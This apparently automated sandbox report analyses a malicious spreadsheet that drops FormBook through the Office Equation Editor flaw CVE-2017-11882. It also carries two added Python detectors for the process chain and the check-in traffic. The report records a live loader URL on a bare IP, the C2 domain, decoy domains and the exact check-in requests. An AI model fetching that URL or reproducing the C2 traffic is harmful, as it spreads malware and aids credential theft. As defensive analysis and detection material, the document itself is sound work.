Windows Analysis Report Remittance_Advice_details001009142021.xlsx

Overview

General Information

Sample Name: Remittance_Advice_details001009142021.xlsx
Analysis ID: 483680
MD5: 849137c07d96b63b89b0fe9fc240751e
SHA1: 21f9985416c2bfc51a88615f5806916fa1165502
SHA256: 594eeeb07a9f81d9a2e3718fb25ca290ca86a45990a9ca89799dcbdcf114779c
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
Multi AV Scanner detection for submitted file
Source: Remittance_Advice_details001009142021.xlsx ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://107.173.219.122/files/loader1.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe ReversingLabs: Detection: 40%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 40%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.vbc.exe.2c0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, wuapp.exe
Source: Binary string: wuapp.pdb source: vbc.exe, 00000008.00000002.521643579.0000000000839000.00000004.00000020.sdmp
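Added example, not part of the Joe Sandbox report: a small detector that replays the EQNEDT32.EXE process chain recorded in the Exploits section over constructed Sysmon-style events and flags the same conditions the report's Sigma signatures describe (Equation Editor started, Equation Editor spawning a child, file dropped by EQNEDT32, execution from a suspicious folder). Paths and command lines are copied from the report; the event field names assume Sysmon Event ID 1 / 11 telemetry, and the suspicious-folder list is an assumed heuristic, not something the report states.

```python
"""
Added example (not from the Joe Sandbox report): replay the EQNEDT32.EXE chain
over constructed Sysmon-style events. Field names assume Sysmon Event ID 1
(ProcessCreate) and 11 (FileCreate); SUSPICIOUS_DIRS is an assumed heuristic.
"""
from dataclasses import dataclass
from typing import List

EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"

# Assumed heuristic: locations from which Office components should never
# launch or drop executables (C:\Users\Public is the one used by this sample).
SUSPICIOUS_DIRS = (
    r"c:\users\public",
    r"c:\programdata",
    r"c:\windows\temp",
    r"\appdata\local\temp",
    r"\appdata\roaming",
)
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".com")


@dataclass
class Event:
    event_id: int                  # Sysmon: 1 = ProcessCreate, 11 = FileCreate
    image: str                     # process being created / process writing the file
    parent_image: str = ""         # ProcessCreate only
    command_line: str = ""         # ProcessCreate only
    target_filename: str = ""      # FileCreate only


def _norm(path: str) -> str:
    return path.strip().lower().replace("/", "\\")


def is_eqnedt32(path: str) -> bool:
    return _norm(path) == _norm(EQNEDT32)


def in_suspicious_dir(path: str) -> bool:
    return any(d in _norm(path) for d in SUSPICIOUS_DIRS)


def classify(ev: Event) -> List[str]:
    """Return the detection names that a single event satisfies."""
    hits: List[str] = []
    if ev.event_id == 1:
        # Equation Editor started through COM (-Embedding): expected whenever a
        # document embeds an equation object, so informational on its own.
        if is_eqnedt32(ev.image) and "-embedding" in ev.command_line.lower():
            hits.append("office_equation_editor_started")
        # EQNEDT32.EXE has no legitimate reason to spawn child processes; a child
        # is the hallmark of CVE-2017-11882 / CVE-2018-0802 exploitation.
        if is_eqnedt32(ev.parent_image):
            hits.append("eqnedt32_spawns_process")
            if in_suspicious_dir(ev.image):
                hits.append("execution_from_suspicious_folder")
    elif ev.event_id == 11:
        if is_eqnedt32(ev.image) and _norm(ev.target_filename).endswith(PE_EXTENSIONS):
            hits.append("file_dropped_by_eqnedt32")
            if in_suspicious_dir(ev.target_filename):
                hits.append("pe_dropped_to_suspicious_folder")
    return hits


def detect_dropper_chain(events: List[Event]) -> bool:
    """True when EQNEDT32.EXE both dropped a PE file and launched a child: the
    sequence the report labels 'Droppers Exploiting CVE-2017-11882'."""
    seen = set()
    for ev in events:
        seen.update(classify(ev))
    return {"file_dropped_by_eqnedt32", "eqnedt32_spawns_process"} <= seen


# Constructed from the report's process- and file-creation lines.
SAMPLE_EVENTS = [
    Event(1, image=EQNEDT32, command_line="'" + EQNEDT32 + "' -Embedding"),
    Event(11, image=EQNEDT32, target_filename=r"C:\Users\Public\vbc.exe"),
    Event(1, image=r"C:\Users\Public\vbc.exe", parent_image=EQNEDT32,
          command_line=r"C:\Users\Public\vbc.exe"),
    # Excel writing a rendered image to its cache: not a PE, not EQNEDT32, benign.
    Event(11, image=EXCEL,
          target_filename=r"C:\Users\user\AppData\Local\Microsoft\Windows"
                          r"\Temporary Internet Files\Content.MSO\AA6CA394.emf"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.event_id, ev.image, "->", classify(ev))
    print("dropper chain:", detect_dropper_chain(SAMPLE_EVENTS))
```

The chain verdict deliberately requires both the drop and the spawn: the "-Embedding" launch alone fires on any workbook with an embedded equation, and a lone child process can be the exploit's second stage executing from a location other than the drop folder, so the two events are correlated rather than alerted on separately.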

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.garimpeirastore.online
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop esi 8_2_00415852
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 8_2_00406A98
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 8_2_00415699
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 4x nop then pop edi 11_2_000F5699
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 4x nop then pop esi 11_2_000F5852
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 4x nop then pop ebx 11_2_000E6A99
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 107.173.219.122:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 107.173.219.122:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 69MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 107.173.219.122:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 52.58.78.16:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 52.58.78.16:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 52.58.78.16:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 209.99.64.51:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 209.99.64.51:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 209.99.64.51:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe Network Connect: 209.99.64.51 80
Source: C:\Windows\explorer.exe Domain query: www.matcitekids.com
Source: C:\Windows\explorer.exe Network Connect: 50.87.248.20 80
Source: C:\Windows\explorer.exe Domain query: www.garimpeirastore.online
Source: C:\Windows\explorer.exe Domain query: www.doityourselfism.com
Source: C:\Windows\explorer.exe Network Connect: 169.62.91.142 80
Source: C:\Windows\explorer.exe Domain query: www.onedadtwodudes.com
Source: C:\Windows\explorer.exe Domain query: www.ecofingers.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.extinctionbrews.com/dy8g/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=X9Az7RtkaU81d6o9S6tJRjQeFUHqBPh6fbjII6Bm04v0rRN3gQJahLAd3CrM9JEnxgRa3A==&7nh=0br0WzXxgHiLa HTTP/1.1; Host: www.ecofingers.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=OTag2QWxPYUT5Vjr08k9uySlAuCzwAh9yU7TJs1orjitWjs6OQC6P28HkD9bWaqSe7I0Ww==&7nh=0br0WzXxgHiLa HTTP/1.1; Host: www.onedadtwodudes.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=Y4JBfBjEKLG3bE/nPu+ARLK4ZQab+dap1kyoobOuuyzzJOKZWwpYr6zx24KPHwTC7q0HDg==&7nh=0br0WzXxgHiLa HTTP/1.1; Host: www.doityourselfism.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=dI9eO6GBnSulhV6EbBGZI9CJMc/scmM0Fshd6X+e3vq0VlxBF2NWOUbA55lfRDBFVPtqQQ==&7nh=0br0WzXxgHiLa HTTP/1.1; Host: www.matcitekids.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
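Added example, not part of the Joe Sandbox report: a parser that separates the two kinds of HTTP request the Networking section records (the loader fetch from a bare IP with a browser User-Agent, and the FormBook check-ins with no User-Agent) and labels each contacted host against the extracted configuration. The request texts are reconstructed from the report's own "HTTP traffic detected" lines with CRLFs restored, plus one constructed benign request for contrast; the C2 and decoy lists are copied from the malware configuration above. The matching rules are assumptions written for this sample, not the logic of the Emerging Threats rules that fired.

```python
"""
Added example (not from the Joe Sandbox report): classify captured HTTP
requests as loader download, FormBook check-in, or no match, and tell real C2
from decoy using the extracted configuration. Matching rules are assumptions.
"""
import ipaddress
import re
from typing import List, Tuple
from urllib.parse import urlsplit

# Copied from the report's malware configuration extractor output.
C2_URLS = ["www.extinctionbrews.com/dy8g/"]
DECOY_DOMAINS = {  # five of the 64 decoys in the extracted configuration
    "ecofingers.com", "onedadtwodudes.com", "doityourselfism.com",
    "matcitekids.com", "garimpeirastore.online",
}

IE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
         "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
         "Media Center PC 6.0; .NET4.0C; .NET4.0E)")

# Constructed sample traffic: three requests reconstructed from the report,
# one benign request added for contrast.
SAMPLE_REQUESTS = [
    "GET /files/loader1.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
    "User-Agent: " + IE_UA + "\r\nHost: 107.173.219.122\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /dy8g/?illD=X9Az7RtkaU81d6o9S6tJRjQeFUHqBPh6fbjII6Bm04v0rRN3gQJahLAd3CrM9JEnxgRa3A=="
    "&7nh=0br0WzXxgHiLa HTTP/1.1\r\nHost: www.ecofingers.com\r\nConnection: close\r\n\r\n"
    + "\x00" * 7,
    "GET /dy8g/?illD=dI9eO6GBnSulhV6EbBGZI9CJMc/scmM0Fshd6X+e3vq0VlxBF2NWOUbA55lfRDBFVPtqQQ=="
    "&7nh=0br0WzXxgHiLa HTTP/1.1\r\nHost: www.matcitekids.com\r\nConnection: close\r\n\r\n"
    + "\x00" * 7,
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/7.79.1\r\n"
    "Connection: close\r\n\r\n",
]

FORMBOOK_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")      # e.g. /dy8g/
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # first query value


def parse_request(raw: str) -> dict:
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def is_direct_ip_exe_download(req: dict) -> bool:
    """Loader fetch: Host is an IP literal (so no DNS query precedes the
    connection) and the path ends in .exe."""
    host = req["headers"].get("host", "").split(":")[0]
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return req["method"] == "GET" and urlsplit(req["target"]).path.lower().endswith(".exe")


def is_formbook_checkin(req: dict) -> bool:
    """Check-in shape seen in the capture: GET /<short dir>/?<key>=<base64 blob>&<key>=<id>,
    only Host and Connection: close (no User-Agent), body made of NUL bytes."""
    if req["method"] != "GET":
        return False
    parts = urlsplit(req["target"])
    if not FORMBOOK_PATH.match(parts.path):
        return False
    # Split by hand: urllib.parse_qsl would turn the '+' in the base64 into spaces.
    params = [p.split("=", 1) for p in parts.query.split("&") if p]
    if len(params) != 2 or len(params[0]) != 2 or not BASE64_BLOB.match(params[0][1]):
        return False
    h = req["headers"]
    return ("user-agent" not in h and h.get("connection", "").lower() == "close"
            and all(c == "\x00" for c in req["body"]))


def _strip_www(host: str) -> str:
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str) -> str:
    """Real C2 from the config, a decoy from the config, or neither."""
    bare = _strip_www(host)
    if bare in {_strip_www(u.split("/", 1)[0]) for u in C2_URLS}:
        return "c2"
    return "decoy" if bare in DECOY_DOMAINS else "unknown"


def triage(raw_requests: List[str]) -> List[Tuple[str, str]]:
    verdicts = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        if is_direct_ip_exe_download(req):
            verdicts.append((host, "loader_download"))
        elif is_formbook_checkin(req):
            verdicts.append((host, "formbook_checkin:" + classify_host(host)))
        else:
            verdicts.append((host, "no_match"))
    return verdicts


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_REQUESTS):
        print(host, verdict)
```

Every check-in host in the capture above is a decoy; the configured C2 (www.extinctionbrews.com/dy8g/) does not appear in the excerpt at all. A blocklist built only from observed destinations would therefore miss the real server, which is why the host-independent URI shape and the absence of a User-Agent are the more useful pivots, with the extracted configuration supplying the domain to block.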
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.58.78.16
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Wed, 15 Sep 2021 09:30:01 GMT; Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29; Last-Modified: Tue, 14 Sep 2021 23:01:05 GMT; ETag: "49600-5cbfc8e69e3fb"; Accept-Ranges: bytes; Content-Length: 300544; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
Data Raw (start of body; remainder of the dump omitted): 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 ... 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e ... 52 69 63 68 ... 50 45 00 00 4c 01 05 00 ... 2e 74 65 78 74 ... 2e 72 64 61 74 61 ... 2e 64 61 74 61 ... 2e 72 73 72 63 ... 2e 72 65 6c 6f 63 (MZ stub with "This program cannot be run in DOS mode.", Rich header, PE\0\0 signature, Machine 0x014c i386, 5 sections: .text, .rdata, .data, .rsrc, .reloc; Content-Length 300544 = 0x49600, matching the ETag prefix)
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /files/loader1.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 107.173.219.122; Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.219.122
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.2
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000A.00000000.484251660.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 0000000A.00000000.499283905.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.484251660.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: AA6CA394.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.488072069.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.553967280.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Anti_Wrinkle_Creams.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2F
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Best_Mortgage_Rates.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2F
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Best_Penny_Stocks.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2FUU
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Credit_Card_Application.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jV
